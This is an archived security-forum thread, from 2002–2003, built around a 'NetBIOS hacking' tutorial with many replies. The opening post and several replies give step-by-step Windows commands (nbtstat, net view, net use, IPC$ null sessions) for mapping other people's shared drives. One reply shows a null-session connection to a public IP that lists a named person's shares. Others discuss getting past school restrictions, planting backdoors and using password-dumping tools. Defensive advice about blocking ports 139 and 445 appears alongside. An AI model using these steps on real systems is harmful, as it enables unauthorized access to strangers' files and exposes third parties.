net bios hacking


RiOtEr
May 25th, 2002, 03:16 PM
NetBIOS Tutorial by RiOtEr

NetBIOS stands for Network Basic Input/Output System and is used in Windows for its file and printer sharing.

1. NetBIOS

To use NetBIOS remotely, the computer has to have it running and unprotected first. To find out if a computer has NetBIOS, boot up your favourite portscanner and look for NetBIOS:

25/tcp open smtp
110/tcp open pop-3
135/tcp open loc-srv
139/tcp open netBIOS-ssn

If your results look like that then you're set...

2. nbtstat

To get the info you need for the attack we use a program called nbtstat:

Open up your console in WinXP, or a DOS-prompt in earlier windows-versions.

c:\>nbtstat -A 127.0.0.1

Use -A if you're using IP addresses. If you're going to use hostnames use -a.

This will give you what is called a nametable:


Local Area Connection 3:
Node IpAddress: [xxx.xxx.xxx.xxx] Scope Id: []

NetBIOS Remote Machine Name Table

Name               Type         Status
---------------------------------------------
computername   <00>  UNIQUE      Registered
workgroupname  <00>  GROUP       Registered
computername   <20>  UNIQUE      Registered
workgroupname  <1E>  GROUP       Registered
workgroupname  <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered

MAC Address = xx-xx-xx-xx-xx-xx


This is a friend's nametable (names and workgroups have been edited to save him from elite_hax0rs)

Now, the line
computername <20> UNIQUE Registered
is the interesting one as <20> means that filesharing is enabled: that means we can try to connect to that computer.
First, we need to know their harddrive names etc, and we need to see if it's xp and if they have SharedDocs. To do this we use net view \\ipaddress

C:\>net view \\127.0.0.1
Shared resources at \\xxx.xxx.xxx.xxx
Share name   Type   Used as   Comment

-----------------------------------
SharedDocs   Disk
The command completed successfully.

That's the result you should get (it will be different on a non-WinXP box).

Now comes the interesting part: we want to use and browse the person's harddrive just like it was locally. For doing that, we use a program called net use
net use letter: \\ipaddress\name

c:\>net use g: \\127.0.0.1\SharedDocs
The command completed successfully.
c:\>net use h: \\127.0.0.1\C
The command completed successfully.

Now their harddrive is "mirrored" to the drive letter we specified (so make sure it's not a drive that exists on your computer). Now just browse it as you would a local drive:

c:\>g:
g:\>

In windows XP (not sure about other windows) you can open up "my computer": the drive you just added will be there for you to browse in all the GUI goodness.
When you're done, make sure you remove the shared drive from your machine:

c:\>net use /delete g:
g: was deleted successfully.

Some systems may be locked with passwords (win2k, WinNT):
If you know the password, you would use this command:

net use \\ip\sharename password (not sure about that one...)

Now, many people will be saying "this is a security site, why are you telling us this?". The reason is simple: I'm showing you how easy it is for your Windows machine to be hacked without proper protection... Moral of this story: always cover port 139.

RiOtEr
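
An added example, not part of RiOtEr's post: a Python check for auditing your own machines that parses saved `nbtstat -A` output and reports which hosts register the `<20>` file-server name described above. The captures, host addresses and machine names are constructed, and the suffix meanings other than `<20>` are the standard NetBIOS assignments rather than something the post states.

```python
import re

# Standard NetBIOS name suffixes: (suffix, type) -> service behind the name.
SUFFIXES = {
    ("00", "UNIQUE"): "Workstation service (computer name)",
    ("00", "GROUP"): "Workgroup/domain name",
    ("20", "UNIQUE"): "File Server service (file/printer sharing)",
    ("1E", "GROUP"): "Browser service elections",
    ("1D", "UNIQUE"): "Master browser",
    ("01", "GROUP"): "Master browser announcement (__MSBROWSE__)",
}

# One row of the name table: name, <hex suffix>, UNIQUE/GROUP, status.
ROW = re.compile(
    r"^\s*(?P<name>\S.*?)\s*<(?P<suffix>[0-9A-Fa-f]{2})>\s+"
    r"(?P<type>UNIQUE|GROUP)\s+(?P<status>\w+)\s*$"
)

def parse_name_table(text):
    """Return one dict per row of an nbtstat remote name table."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # headers, separators, MAC line, "Host not found."
        suffix, kind = m.group("suffix").upper(), m.group("type")
        rows.append({
            "name": m.group("name"),
            "suffix": suffix,
            "type": kind,
            "status": m.group("status"),
            "service": SUFFIXES.get((suffix, kind), "unknown"),
        })
    return rows

def file_sharing_enabled(rows):
    """True when the host registers the <20> UNIQUE file-server name."""
    return any(
        r["suffix"] == "20" and r["type"] == "UNIQUE"
        and r["status"] == "Registered"
        for r in rows
    )

def audit(captures):
    """captures maps host -> saved nbtstat output; returns hosts sharing files."""
    return sorted(
        host for host, out in captures.items()
        if file_sharing_enabled(parse_name_table(out))
    )

# Constructed sample captures (documentation addresses, made-up names).
SAMPLES = {
    "192.0.2.10": """
       Name               Type         Status
    ---------------------------------------------
    OFFICE-PC      <00>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered
    OFFICE-PC      <20>  UNIQUE      Registered
    WORKGROUP      <1E>  GROUP       Registered
    WORKGROUP      <1D>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered

    MAC Address = 00-00-5E-00-53-01
""",
    "192.0.2.11": """
       Name               Type         Status
    ---------------------------------------------
    LAPTOP         <00>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered
""",
    "192.0.2.12": "    Host not found.\n",
}

if __name__ == "__main__":
    for host in audit(SAMPLES):
        print(f"{host}: <20> registered, file/printer sharing is on")
```

A host that shows up here is one where sharing should either be turned off or restricted to trusted addresses at the firewall.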

Rewandythal
May 25th, 2002, 03:31 PM
great post Rioter.

JRoc
May 25th, 2002, 05:34 PM
Thank yah!

jethro
May 25th, 2002, 06:53 PM
fl00t!

jaguar291
May 25th, 2002, 09:00 PM
Good post, I learned something!

ammo
May 25th, 2002, 10:12 PM
"Moral of this story: always cover port 139."

True, but Win2000 and WinXP also listen on port 445 for SMB service directly over TCP. Port 139 is like "smb over netbios over tcp" (sort of)...

Moral of this follow up: if you run w2k or wXP, always cover port 139 AND 445

Ammo

NetwrkBurn
May 25th, 2002, 10:19 PM
So when you port scan a system and netbios services are open you can just use net to connect and rummage through their directories?

ammo
May 25th, 2002, 10:23 PM
Sometimes...

Depends if there are actually drives shared, and depends on if passwords are set.

Ammo

preep
May 25th, 2002, 11:59 PM
very good, expect some green, amn best tut ive ever read.

preep

RuffRyder
May 26th, 2002, 12:23 AM
um... ur all probably gunna tell me i have stupid questions but at least i might be safe if its answered, if u have a firewall doesnt it protect all ports?

JRoc
May 26th, 2002, 12:24 AM
One's that you specify it to protect, yeah.

cwk9
May 26th, 2002, 01:29 AM
Leave it to m$ to build a Trojan into the OS. Blocking the netbios ports is a good start but I like to go a step further and uninstall netbios all together.

A how to on removing netbios
http://www.techsupportalert.com/search/t1720.pdf

d313t3d
May 26th, 2002, 02:21 AM
http://packetstorm.dnsi.info/NT/docs/null.sessions.html :D

spyhunt3r
May 26th, 2002, 02:34 AM
To connect to Windows NT/2k share:

c:\>net use \\victim_ip\ipc$ password /user:username

c:\>net view \\victim_ip

c:\>net use * \\victim_ip\share

RiOtEr
May 27th, 2002, 07:33 AM
I thought, given that this is a security site, I didn't really cover how to stop such attacks well. If you don't need file/printer sharing then turn it off; that will stop the majority of attacks. But if you do need it, download a firewall and make sure you block any incoming connections to port 139 and 445, as ammo pointed out, because you probably need it, but if you do, limit the IPs that can connect to it, i.e. trusted IPs.
hope thats a bit of help
RiOtEr

shaunramos
May 27th, 2002, 12:57 PM
this is just a command-line way of mapping a drive!!nothing new!!!

smirc
May 27th, 2002, 12:59 PM
"this is just a command-line way of mapping a drive!!nothing new!!!"

Show us something new then ;).

huntx7
May 28th, 2002, 07:08 PM
Good job!

Dr Toker
May 28th, 2002, 07:53 PM
By far the best tutorial i have read since november.

titanmike
May 28th, 2002, 09:51 PM
Thanks for answering a question before i could ask it:)

shaunramos
May 29th, 2002, 11:35 AM
this is just the same as mapping a drive...youre just using the command line!!!nothing new!!!

RiOtEr
May 29th, 2002, 11:46 AM
/me tries hard not to flame but im in a shitty mood

it may not be new for you sorry mr elite hacker ill write tutorials on only topics that you know and forget 70% of this board that ok for you...?
so here it goes a tutorial of your kind
how to leave people alone
1. see the little red button with a cross through it click it
2. see that little start menu (cause someone as elite as you would only be using the lunix) click it
3. see shutdown computer button click that as well
4. see that computer thing take it and give it to your mum cause she can put it to better use
5. see that elitist attitude well special.php is the only solution for it
RiOtEr

JetForceGeminiX
May 31st, 2002, 03:58 AM
cool

free-fall
December 18th, 2002, 07:02 AM
I haven't quite understood, but I guess it's nice. Who knows, I might need it someday. Good job rioter

JockVSJock
December 21st, 2002, 06:41 AM
Great info!

I read the attached .pdf file, and have disabled netbios on my W2K box, but I am wondering, should I remove the netbios.dll file too? I didn't see anymore info on it.

thehorse13
December 21st, 2002, 11:49 AM
That depends on many things. Bottom line: Check your firewall configs to be sure that it is blocking everything that you need blocked. Best practice is to operate on the least privilege model (only allow what is specifically needed; otherwise, block it).

JagFire19
December 21st, 2002, 01:50 PM
Good tutorial! Taught me more about 'computer defense'.

phaza7
December 27th, 2002, 02:58 AM
Excellent tut!! Ri0tEr,

This helps me a lot to secure my box. I never knew that such a thing was possible!

tyger_claw
December 27th, 2002, 03:03 AM
Jock, deleting that file won't do anything about protecting your NetBIOS.....

As long as it's disabled/masked by the firewall and you disable file and printer sharing, you're OK.

UrDaddy
April 2nd, 2003, 08:44 PM
Well its a great tutorial. But it not working for me i guess.

I am getting this problem that whenever I type
net use p: \\ip\C

the dos tells me System error 53 has occurred. Network path was not found.

Any idea why is it happening!!!!!

thanks in advance.

Best Regards.

phishphreek
April 2nd, 2003, 08:52 PM
"the dos tells me System error 53 has occurred. Network path was not found."

I get that error when I try to connect to a box that doesn't have file/print share enabled, or that particular share isn't there. I can't remember which one at the moment.

FYI- The default share for 2k is c$ which means its hidden

you would use

net use p: \\ip\c$

to connect to that one.

UrDaddy
April 2nd, 2003, 08:55 PM
Thanks.........dat really worked.

Once again thanks a lot. I really appreciate that.

Best regards.

Another question!!!

Now it is giving me system error 85 has occurred.

The local drive name is already in use.

any idea why is it happening.

thanks.

BTW I am connecting to another pc which I own and experimenting with it. I thought that it will be helpful in telling that.

Best regards.

bballad
April 2nd, 2003, 09:03 PM
Good tut, and as a side note this is one of the most useful tools Microsoft has given the sysadmin. With netbios, hidden shares, and the NFS commands (net use etc.) we can have active shares to deal with centralized installation files with the user never knowing they are there. This is in no way a cracker tool with no legitimate use.

phishphreek
April 2nd, 2003, 09:14 PM
"Now it is giving me system error 85 has occurred. The local drive name is already in use. any idea why is it happening"

You are too funny... :confused:

if you used drive p to connect, then it is still connected until you use

net use p: /delete

you can't assign 2 shares to the same drive letter.

to find out what ones you are currently using...

net use

UrDaddy
April 2nd, 2003, 09:23 PM
Oh I am sorry. I did figure it out before your reply. I will try to be careful in the future.

Both pc have WIN XP.


Now the command is working on my own pc but when I try to do the same to gain access to the second pc it tells me that system error 5 has occurred, and to insert the username guest for that pc and then the password.

First of all that pc have no guest login and only one login specified and i know the password for that. But it keeps on telling me that access denied.

I like to know is that should i make a guest login on that screen and can access it with the password provided there.


Do forgive me for some of my silly posts. I understand how fed up one becomes with some questions but I am a newbie and will try to be careful in the future.


Thanks.

Best Regards,

Mizo
April 3rd, 2003, 02:17 AM
tja , i saw other lections about hacking under NetBios, thisone is good, but if some1 wanna read another1: www.hackerthreads.com -> hacking under NetBios ( with examples) ist good too! :> enjoy!

Knowledge is power!!!

UrDaddy
April 3rd, 2003, 06:27 PM
its www.hackerthreads.org instead of www.hackerthreads.com . Just a minor mistake.

UrDaddy
April 4th, 2003, 03:31 AM
I have a question that does net use command works if we try to access other than shared resources on another computer. I have came to know that XP is the most powerful OS of MS and it is very good security wise. So does net use command of DOS works on XP or not.

Thanks

Best Regards.

Fabs
April 4th, 2003, 03:59 AM
dodgiest tut on netbios I've ever seen

powertoad5000
April 4th, 2003, 04:26 AM
"I have a question that does net use command works if we try to access other than shared resources on another computer. I have came to know that XP is the most powerful OS of MS and it is very good security wise. So does net use command of DOS works on XP or not."

The tutorial was written with XP in mind, so you'll have no troubles there. And you can't access non-shared resources over netbios using these techniques. But if you can install a backdoor with your shared resource access, then you can get to the whole computer in the end anyway.

kilerboots
April 4th, 2003, 06:50 AM
Hey I got a question, [Win ME]
Well I was doing this, opened up MS-DOS prompt then typed in nbtstat -a 127.0.0.1 and it started but then it said host not found. I was wondering why it says that, and I tried doing it with my friend's ip but it said the same thing. Now what do I do?

Thanks, this was a very great thread.

UrDaddy
April 4th, 2003, 07:09 AM
Originally posted by powertoad5000

"The tutorial was written with XP in mind, so you'll have no troubles there. And you can't access non-shared resources over netbios using these techniques. But if you can install a backdoor with your shared resource access, then you can get to the whole computer in the end anyway."


I have a fair bit of idea using backdoors but I just am curious that is DOS that powerful that you can have access to another pc's hard drive even if it is not shared.

So far I think that XP is the most powerful OS made by MS, security wise. Although I have no idea about the other OS's of MS in this particular matter, XP is not letting me get through it, which is in a way a good thing, so from now on I should always go for XP on my LAN pcs.

waverebel
April 4th, 2003, 07:26 AM
Killerboots use a -A instead of -a
case is important in this instance.

ps The loopback address 127.0.0.1 doesn't seem to work in 2k either, try the IP address of your Network card / Modem if dialed in (get these using ipconfig at the command line)

Ur Daddy, I am not sure if this is what you are asking but there are default
shares of c$, d$ etc for each drive under win2k at least. So block that port!

kilerboots
April 4th, 2003, 07:30 AM
I had already tried that but still comes up with the same answer "Host not found".

UrDaddy
April 4th, 2003, 07:37 AM
Originally posted by kilerboots
"I had already tried that but still comes up with the same answer "Host not found"."


Yes, same is the case with XP. Try doing this with your ip instead of 127.0.0.1 and you'll get the desired results.

kilerboots
April 4th, 2003, 07:49 AM
Oh ok I got it working and thanks everyone for the help.

ajit
April 4th, 2003, 10:19 AM
Thanks for great post

phazeout420
April 21st, 2003, 11:59 PM
Note that this doesn't work in some Exchange-run terminals? I have actually tried this at my school and found that this was blocked by Exchange 2000 server.

I mean, our school teachers and their affiliates are pretty dumb, when it comes to securing school computers. But this time the software version seems to work perfectly, in unification with the Windows 2000.

It was interesting to get through blocked command usage, but with help of the *.bat files, it was successful. Up to assigning a drive-map.

However, it failed to assign a drive-map without a notice. In the cmd.exe it actually stated that "net use command was successful".

Any idea how to bypass that?

tomservo911
April 22nd, 2003, 06:57 PM
I'm relatively annoyed -- please be patient with my lack of insight here, but I'm extremely new to this.

I keep using the command "nbtstat -A [IP address]" to get a table on hosts which I know have netbios shared resources available, but nothing comes up. Instead, I seem to be getting the same thing for every attempt at this:

Lana # 0:
Node IpAddress: [67.13.241.161] Scope Id: []

Host not found.

Lana # 1:
Node IpAddress: [67.13.241.87] Scope Id: []

Host not found.

Lana # 2:
Node IpAddress: [172.147.10.119] Scope Id: []

Host not found.

I have concluded that the fact that I keep getting those three IP addresses for every target I try indicates that it is a problem based around my ISP -- compuserve. *Dodges flying objects*
Is this the reason I'm not getting any connection tables using nbtstat in the DOS prompt?

The other possibility I've thought of is that I'm using Windows ME, which I'm generally aware of being the suckiest operating system ever conceived of, and I think that this might hinder my ability to get this to work.

I'm sorry if this is incoherent, but as I said I'm fairly new to the game, so any help would be appreciated. Thanks. :)

CraZy_AhmaD
June 15th, 2003, 10:22 AM
Originally posted by ammo
"Moral of this story: always cover port 139."

True, but Win2000 and WinXP also listen on port 445 for SMB service directly over TCP. port 139 is like "smb over netbios over tcp" (sortof)...

Moral of this follow up: if you run w2k or wXP, always cover port 139 AND 445

Ammo

yup... no need to search for smtp / pop3 just port 139 / 445
usually 139 is enough

skiddieleet
October 8th, 2003, 04:54 AM
Has anyone ever printed out to the remote computers printer that they need to put up a firewall?
That would be funny to print something on their computer. Is this illegal to do? It seems like it would be.
One more question, can you run programs from the remote comps program files directory or will they not work because you have to have the dll's and stuff locally?
Thanks for the tut.

homenet
October 8th, 2003, 11:06 AM
No, you couldn't directly run programs on their computer because netbios is a file sharing protocol. Not taking into account trojans and the like, the only proper ways to run programs on other computers is through telnet and terminal services.
I'm guessing you could print on their computer but they would have to have it set up for file and print sharing.
And yes it would be illegal, it doesn't matter what you're doing, if you're accessing someone else's computer that you do not have permission for you're breaking the law

tr3kker
October 8th, 2003, 02:38 PM
RuffRyder........ thats funny

rofl
:)

c0bra
October 8th, 2003, 08:56 PM
yeah great post but I don't suppose this applies to me as I have changed over to LINUX and obviously for good reason

P.S. how much would a firewall help prevent this

skiddieleet
October 8th, 2003, 09:05 PM
if the firewall blocked port 139(which it should by default) then it will help a great deal because basically access to that port is only allowed locally, and most firewalls have a trusted zone to put comps on your network into so you can allow them to access that port while not allowing remote machines.

Scriptersx
October 8th, 2003, 10:40 PM
Firewalls usually block all ports but if you're running on a network, the admin might be set up to allow connections to that port(s)

Juridian
October 8th, 2003, 11:24 PM
Your firewall can help quite a bit in solving many of the problems. You do however need to learn to properly configure it to allow you access to everything you need while blocking access to everyone else when attempting to connect to your box.

Sgear17
October 9th, 2003, 02:25 AM
good tips post for the newbies like me thankz a lot

Turmoil
October 9th, 2003, 04:37 AM
wow! So that's how those lil buggers were doing it! lol Thanks for the info... if this prog can be used for these reasons, why is it included in windows???

jbomber
October 9th, 2003, 05:20 AM
How do I block ports? I want to block port 139 but I don't know how to. I don't have a firewall but a router. I'm using XP Pro. Whenever I check netstat -a -n ... I see that port 139 is in the state of Listening

Thanks,
bomber

skiddieleet
October 9th, 2003, 08:38 PM
"I dont have a firewall but a router."
does your router have a firewall, because if it does then port 139 should already be blocked.
Also, are you on a network, because the router firewall won't block ports within the network. If you are not on a network, I recommend that you uninstall netbios, here is a link from within the thread

http://www.techsupportalert.com/search/t1720.pdf

good luck.

tekno
October 10th, 2003, 06:14 PM
If you have a router, and using port address translation (Many to One), you should be protected from this. With this, there is no translation built for this port, so an incoming connection has no way of getting there.

If you have a firewall....you should also be protected, because if the firewall is doing what it should be doing. If a connection attempt is made and the connection wasn't initiated from the inside, then it shouldn't let that traffic pass through.

If you have static address translations, or have your computer is directly connected to your cable modem or you have opened up the 'evil' ports, well then....all bets are off.

Obviously different vendors' equipment will have different options, but these are standard options among most routers/firewalls.

laters.


**EDIT**
If you're inside the network, then either put another firewall between you and the lan or run something like BlackICE or another host-based IDS application.

Andrus
November 21st, 2003, 03:56 AM
hmm, nbstat is unrecognized on my comp...

skiddieleet
November 21st, 2003, 03:59 AM
That's probably a good thing. I think all that means is that you don't have NetBIOS installed. That is good security wise. Just be thankful. You should be able to find something on here or at google if you want to turn it on. Try right-clicking on network neighborhood or my network places and selecting properties. If you do turn it on make sure you have a good firewall configured correctly.

Andrus
November 21st, 2003, 04:50 PM
does that mean noone can use that against me?
if so, i think i'll leave it off, its my good comp

skiddieleet
November 21st, 2003, 06:00 PM
I'm pretty sure that it does. Even so you still want to have a firewall and antivirus software.
firewall: http://soho.sygate.com/buy/download_buy.htm
The one at the bottom there is free.
Antivirus: http://www.grisoft.com/us/us_dwnl_free.php
Be safe.

Andrus
November 21st, 2003, 08:41 PM
ive got antivirus and a fire wall, and a firewall with my router

skiddieleet
November 21st, 2003, 08:48 PM
Sounds like you're in good shape. Just watch your computer and make sure nothing funny ever happens on it such as folders popping up that weren't there before, and the harddrive light blinking for more than a few seconds when the computer is doing nothing. If you have a firewall it is probably safe to turn netBIOS on so you can learn about the stuff in this tutorial. Just make sure the firewall blocks port 139. You should be able find info on netBIOS from google.

Andrus
November 21st, 2003, 09:02 PM
ok but... ive got a few games, Warcraft 3, Americas army, and to play those i turned on port forwarding with my router, am i still safe??
btw is black ice a good firewall?

skiddieleet
November 21st, 2003, 09:07 PM
When you say you turned on port forwarding, I'm going to assume you only forward the requests for the port used by the game and no others. In that case you are fairly safe. I say fairly, because, no matter what you do, if someone has the determination and the skill, you will get owned. But I wouldn't worry too much. Sounds like you are doing a lot of the right things. As for Black Ice, I've never used it, but most firewalls will do the job just fine as long as they are configured properly.

edit
If you have any more questions just PM me since this already seems to be a one on one discussion. If I can't help you, and google and the forum search can't help you, then post it here or some other related thread, or just make a new thread and I'm sure someone will be able to help you.

FiLe_MaN
November 30th, 2003, 06:49 AM
Yes, netbios is a really interesting thing and really easy to use. I really liked to congratulate the tutorial and the detailed way you explained, since many people are trying and probably accessing hard drives and shares because of what you wrote. You should have written too the ways to protect, like establishing a password, using a firewall to close the ports 137, 138, 139, and disabling the file and printer sharing. You should say that this kind of access is not very stealthy and can get you in trouble. You could have mentioned too that a lot of smart people share camouflaged trojans under other file formats besides exec and that these appear many times as desirable information like passwords and account information. You could probably have said that this is a good way for people who access this way to see their systems permanently destroyed. It's easy and sometimes very fun to use the netbios/nbtstat to check some boxes but don't forget the people that see in this the possibility to infect others. I have seen this happening many times. Some animal fakes death, the vultures come near to feed and end up as food.

FiLe_MaN
November 30th, 2003, 07:09 AM
just check out google or yahoo for a prog named r3x.for the netbios access lovers.

Necro)Rage
December 16th, 2003, 07:10 PM
Hey cwk9 do u play Battle.net? if so Find me on Necro)Rage@Azeroth

labchick64
December 17th, 2003, 04:32 AM
This is my first post on AO, but I just wanted to say thank you for the tutorial. The information was well laid out and very helpful.

hiddeninclouds
December 23rd, 2003, 05:54 AM
This should give you some answers :)
http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q137/5/65.asp&NoWebContent=1

neohunk
December 23rd, 2003, 01:00 PM
from where u ppl get all this stuff
its very interesting to learn all this

Trixillate
December 23rd, 2003, 04:25 PM
C:\>nslookup 24.49.32.1
Server: nscache2.chvlva.adelphia.net
Address: 24.51.159.133

Name: va-frontroyal1a-gate.chvlva.adelphia.net
Address: 24.49.32.1


C:\>Net use //24.49.32.1/ipc$ /user: ""
The command completed succesfully.

C:\>net use G: //24.49.32.1/ipc$ /user: ""
The command completed succesfully.

C:\>net view //24.49.32.1

Carol Hoopes

Share name   Type    Used as   Comment

-----------------------------------------------------------------
Printer      Print             Lexmark X74-X75
SharedDocs   Disk
The command completed successfully.

C:\>G:
G:\>Net use //24.49.32.1 /delete
The command completed successfully.

NOTE: here is to give you a little better idea of what you can do .... also you can go to www.l0pht.com and download NBTDUMP.EXE it is a VERY nice program for getting netbios shares and passwords it's a dos program and it writes the results in a nice clean HTML file.